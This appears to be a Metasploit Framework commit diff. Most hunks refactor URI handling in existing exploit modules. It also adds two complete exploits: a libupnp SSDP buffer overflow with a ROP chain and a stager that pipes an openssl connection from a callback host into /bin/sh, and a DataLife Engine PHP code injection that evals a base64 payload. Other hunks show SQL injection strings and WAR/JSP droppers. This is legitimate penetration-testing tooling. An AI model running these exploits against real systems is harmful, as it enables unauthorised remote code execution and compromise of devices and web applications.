if uri[-1,1] != '/'
uri = uri + "index.php"
else
uri = uri + "/index.php"
end
uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_raw({
'uri' => uri
@ -91,12 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
def retrieve_session(user, pass)
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + "login.php"
else
uri = uri + "/login.php"
end
uri = normalize_uri(datastore['URI'], "login.php")
res = send_request_cgi({
'uri' => uri,
@ -121,12 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_page(session, newpage, contents)
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + "ftp_upload_file.php"
else
uri = uri + "/ftp_upload_file.php"
end
uri = normalize_uri(datastore['URI'], "ftp_upload_file.php")
boundary = rand_text_alphanumeric(6)
@ -187,12 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
def cmd_shell(cmdpath)
print_status("Calling payload: #{cmdpath}")
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + cmdpath
else
uri = uri + "/#{cmdpath}"
end
uri = normalize_uri(datastore['URI'], cmdpath)
send_request_raw({
'uri' => uri

24
modules/exploits/multi/http/sonicwall_gms_upload.rb
View File

@ -181,40 +181,46 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit_java
print_status("#{@peer} - Uploading WAR file")
jsp_name = "index"
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
}).to_s
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = path_join(install_path, "webapps", "#{app_base}.war")
war_filename = path_join(install_path, "webapps","#{app_base}.war")
register_files_for_cleanup(war_filename)
dropper = jsp_drop_bin(war, war_filename)
dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
upload_and_run_jsp(dropper_filename, dropper)
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
send_request_cgi(
print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def exploit_native
print_status("#{@peer} - Uploading executable file")
exe = payload.encoded_exe
exe_filename = Rex::Text.rand_text_alpha(8)
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win"
exe << ".exe"
end
register_files_for_cleanup(exe_filename)
dropper = jsp_drop_and_execute(exe, path_join(install_path, exe_filename))
dropper = jsp_drop_and_execute(exe, exe_filename)
dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
upload_and_run_jsp(dropper_filename, dropper)

14
modules/exploits/multi/http/testlink_upload_exec.rb
View File

@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1, 1] != '/'
peer = "#{rhost}:#{rport}"
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}login.php"
'uri' => normalize_uri(base, "login.php")
})
return Exploit::CheckCode::Unknown if res.nil?
@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}",
'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}upload_area/#{table}/#{id}/"
'uri' => normalize_uri(base, "upload_area", table, id)
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
@ -238,11 +238,11 @@ class Metasploit3 < Msf::Exploit::Remote
# attempt to retrieve real file name from the database
if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.")
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}#{sqli}",
'uri' => sqli,
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
send_request_cgi({
'method' => 'GET',
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")

6
modules/exploits/multi/http/tomcat_mgr_deploy.rb
View File

@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# UPLOAD
#
path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
res = send_request_cgi({
'uri' => path_tmp,
@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# DELETE
#
path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'uri' => path_tmp,
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def query_serverinfo()
path = normalize_uri(datastore['PATH']) + '/serverinfo'
path = normalize_uri(datastore['PATH'], '/serverinfo')
res = send_request_raw(
{
'uri' => path

9
modules/exploits/multi/http/traq_plugin_exec.rb
View File

@ -58,8 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
uri = normalize_uri(datastore['URI'], "admincp", "login.php")
res = send_request_raw(
{
@ -75,8 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
p = Rex::Text.encode_base64(payload.encoded)
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook"
res = send_request_cgi(
{
@ -92,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 25)
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_cgi(
{

8
modules/exploits/multi/http/vbseo_proc_deutf.rb
View File

@ -55,9 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => "POST",
@ -82,9 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => 'POST',

8
modules/exploits/multi/http/webpagetest_upload_exec.rb
View File

@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res1 = send_request_raw({'uri'=>"#{base}/index.php"})
res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")})
res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")})
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/work/resultimage.php",
'uri' => normalize_uri("#{base}/work/resultimage.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
@target_path = "#{base}/results/#{fname}"
@target_path = normalize_uri("#{base}/results/#{fname}")
print_status("#{peer} - Requesting #{@target_path}")
res = send_request_cgi({'uri'=>@target_path})

12
modules/exploits/multi/http/wikka_spam_exec.rb
View File

@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
'uri' => normalize_uri(@base, "wikka.php")
})
# Get the cookie in this format:
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
@ -189,11 +189,11 @@ class Metasploit3 < Msf::Exploit::Remote
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
'uri' => normalize_uri(@base, "spamlog.txt.php")
})
end

2
modules/exploits/multi/misc/pbot_exec.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'evilcry', # pbot analysis'
'Jay Turla', # pbot analysis
'@bwallHatesTwits', # PoC
'bwall', # aka @bwallHatesTwits, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,

349
modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb Normal file
View File

@ -0,0 +1,349 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the unique_service_name()
function of libupnp's SSDP processor. The libupnp library is used across
thousands of devices and is referred to as the Intel SDK for UPnP
Devices or the Portable SDK for UPnP Devices.
Due to size limitations on many devices, this exploit uses a separate TCP
listener to stage the real payload.
},
'Author' => [
'hdm', # Exploit dev for Supermicro IPMI
'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI
'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5958' ],
[ 'US-CERT-VU', '922681' ],
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
#
# # The following BadChars do not apply since we stage the payload
# # through a secondary connection. This is just for reference.
#
# 'BadChars' =>
# # Bytes 0-8 are not allowed
# [*(0..8)].pack("C*") +
# # 0x09, 0x0a, 0x0d are allowed
# "\x0b\x0c\x0e\x0f" +
# # All remaining bytes up to space are restricted
# [*(0x10..0x1f)].pack("C*") +
# # Also not allowed
# "\x7f\x3a" +
# # Breaks our string quoting
# "\x22",
# Unlimited since we stage this over a secondary connection
'Space' => 8000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
# specific payloads vary widely by device (openssl for IPMI, etc)
}
},
'Targets' =>
[
[ "Automatic", { } ],
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", {
# The callback handles all target-specific settings
:callback => :target_supermicro_ipmi_131,
# This matches any line of the SSDP M-SEARCH response
:fingerprint =>
/Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi
#
# SSDP response:
# Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1
# http://192.168.xx.xx:49152/IPMIdevicedesc.xml
# uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
} ],
[ "Debug Target", {
# The callback handles all target-specific settings
:callback => :target_debug
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 29 2013'))
register_options(
[
Opt::RHOST(),
Opt::RPORT(1900),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
], self.class)
end
def exploit
configure_socket
target_info = choose_target
unless self.respond_to?(target_info[:callback])
print_error("Invalid target specified: no callback function defined")
return
end
buffer = self.send(target_info[:callback])
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:schemas:device:" + buffer + ":end\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n\r\n"
print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...")
r = udp_sock.sendto(pkt, rhost, rport, 0)
1.upto(5) do
::IO.select(nil, nil, nil, 1)
break if session_created?
end
# No handler() support right now
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_supermicro_ipmi_131
# Create a fixed-size buffer for the payload
buffer = Rex::Text.rand_text_alpha(2000)
# Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()
buffer[0,1] = '"'
buffer[1999,1] = '"'
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Restart the service and use openssl to stage the real payload
# Staged because only ~150 bytes of contiguous data are available before mangling
cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#"
buffer[432, cmd.length] = cmd
# Adjust $r3 to point from the bottom of the stack back into our buffer
buffer[304,4] = [0x4009daf8].pack("V") #
# 0x4009daf8: add r3, r3, r4, lsl #2
# 0x4009dafc: ldr r0, [r3, #512] ; 0x200
# 0x4009db00: pop {r4, r10, pc}
# The offset (right-shifted by 2 ) to our command string above
buffer[284,4] = [0xfffffe78].pack("V") #
# Copy $r3 into $r0
buffer[316,4] = [0x400db0ac].pack("V")
# 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1
# 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4)
# Move our stack pointer down so as not to corrupt our payload
buffer[320,4] = [0x400a5568].pack("V")
# 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198
# 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc}
# Finally return to system() with $r0 pointing to our string
buffer[141,4] = [0x400add8c].pack("V")
return buffer
=begin
00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev
00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev
00032000-00055000 rwxp 00000000 00:00 0 [heap]
40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so
40015000-40017000 rwxp 00000000 00:00 0
4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so
4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so
4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so
4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so
40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so
40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so
40036000-40078000 rwxp 00000000 00:00 0
40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so
40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so
40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so
40185000-40187000 rwxp 00000000 00:00 0
bd600000-bd601000 ---p 00000000 00:00 0
bd601000-bd800000 rwxp 00000000 00:00 0
bd800000-bd801000 ---p 00000000 00:00 0
bd801000-bda00000 rwxp 00000000 00:00 0
bdc00000-bdc01000 ---p 00000000 00:00 0
bdc01000-bde00000 rwxp 00000000 00:00 0
be000000-be001000 ---p 00000000 00:00 0
be001000-be200000 rwxp 00000000 00:00 0
be941000-be956000 rwxp 00000000 00:00 0 [stack]
=end
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
buffer = Rex::Text.pattern_create(2000)
end
def stage_real_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_real_payload(client)
}
# Start the listening service
self.service.start
end
#
# Shut down any running services
#
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
def choose_target
# If the user specified a target, use that one
return self.target unless self.target.name =~ /Automatic/
msearch =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n\r\n"
# Fingerprint the service through SSDP
udp_sock.sendto(msearch, rhost, rport, 0)
res = nil
1.upto(5) do
res,addr,info = udp_sock.recvfrom(65535, 1.0)
break if res and res =~ /^(Server|Location)/mi
udp_sock.sendto(msearch, rhost, rport, 0)
end
self.targets.each do |t|
return t if t[:fingerprint] and res =~ t[:fingerprint]
end
if res and res.to_s.length > 0
print_status("No target matches this fingerprint")
print_status("")
res.to_s.split("\n").each do |line|
print_status(" #{line.strip}")
end
print_status("")
else
print_status("The system #{rhost} did not reply to our M-SEARCH probe")
end
fail_with(Exploit::Failure::NoTarget, "No compatible target detected")
end
# Accessor for our TCP payload stager
attr_accessor :service
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
#
# Required since we aren't using the normal mixins
#
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
# Accessor for our UDP socket
attr_accessor :udp_sock
end

6
modules/exploits/unix/webapp/basilic_diff_exec.rb
View File

@ -61,12 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote
def check
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
sig = rand_text_alpha(10)
res = send_request_cgi({
'uri' => "/#{base}/Config/diff.php",
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => sig,
'new' => '1',
@ -86,10 +85,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending GET request...")
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
res = send_request_cgi({
'uri' => "/#{base}/Config/diff.php",
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => "&#{payload.encoded} #",
'new' => '1',

4
modules/exploits/unix/webapp/coppermine_piceditor.rb
View File

@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
}, 25)
if (res and res.body =~ /Coppermine Picture Editor/i)
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URI']) + "/picEditor.php",
'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),
'vars_post' =>
{
'angle' => angle,

95
modules/exploits/unix/webapp/datalife_preview_exec.rb Normal file
View File

@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DataLife Engine preview.php PHP Code Injection',
'Description' => %q{
This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
with the e modifier, which allows to inject arbitrary php code, when there is a
template installed which contains a [catlist] or [not-catlist] tag, even when the
template isn't in use currently. The template can be configured with the TEMPLATE
datastore option.
},
'Author' =>
[
'EgiX', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1412' ],
[ 'BID', '57603' ],
[ 'EDB', '24438' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Keys' => ['php']
},
'DisclosureDate' => 'Jan 28 2013',
'Targets' => [ ['DataLife Engine 9.7', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
], self.class)
end
def uri
normalize_uri(target_uri.path, 'engine', 'preview.php')
end
def send_injection(inj)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' =>
{
'catlist[0]' => inj
},
'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
})
res
end
def check
fingerprint = rand_text_alpha(4+rand(4))
res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end
end

9
modules/exploits/unix/webapp/egallery_upload_exec.rb
View File

@ -58,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}egallery/uploadify.php"
'uri' => normalize_uri(uri, "egallery", "uploadify.php")
})
if res and res.code == 200 and res.body.empty?
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}egallery/uploadify.php",
'uri' => normalize_uri("#{uri}egallery/uploadify.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data
})
@ -113,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}#{payload_name}"
'uri' => normalize_uri("#{uri}#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect

5
modules/exploits/unix/webapp/joomla_tinybrowser.rb
View File

@ -54,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
uri << '?type=file&folder='
res = send_request_raw(
{
'uri' => uri

22
modules/exploits/unix/webapp/openx_banner_edit.rb
View File

@ -68,9 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'www/admin/'
uri = normalize_uri(datastore['URI'], 'www', 'admin/')
res = send_request_raw(
{
'uri' => uri
@ -108,9 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Static files
img_dir = 'images/'
uri_base = normalize_uri(datastore['URI'])
uri_base << '/' if uri_base[-1,1] != '/'
uri_base << 'www/'
uri_base = normalize_uri(datastore['URI'], 'www/')
# Need to login first :-/
cookie = openx_login(uri_base)
@ -166,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw(
{
'uri' => uri_base + 'admin/index.php'
'uri' => normalize_uri(uri_base, 'admin/index.php')
}, 10)
if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/)
return nil
@ -176,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => uri_base + 'admin/index.php',
'uri' => normalize_uri(uri_base, 'admin/index.php'),
'vars_post' =>
{
'oa_cookiecheck' => cookie,
@ -201,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
def openx_find_campaign(uri_base, cookie)
res = send_request_raw(
{
'uri' => uri_base + 'admin/advertiser-campaigns.php',
'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'),
'headers' =>
{
'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}",
@ -269,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-edit.php",
'uri' => normalize_uri(uri_base, "admin/banner-edit.php"),
'method' => 'POST',
'data' => data,
'headers' =>
@ -287,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Ugh, now we have to get the banner id!
res = send_request_raw(
{
'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}",
'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}",
'method' => 'GET',
'headers' =>
{
@ -319,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Ugh, now we have to get the banner name too!
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{
@ -338,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{

4
modules/exploits/unix/webapp/oscommerce_filemanager.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending file save request")
response = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save",
'method' => 'POST',
'data' => data,
'headers' =>
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
'uri' => normalize_uri(datastore['URI'], File.basename(filename))
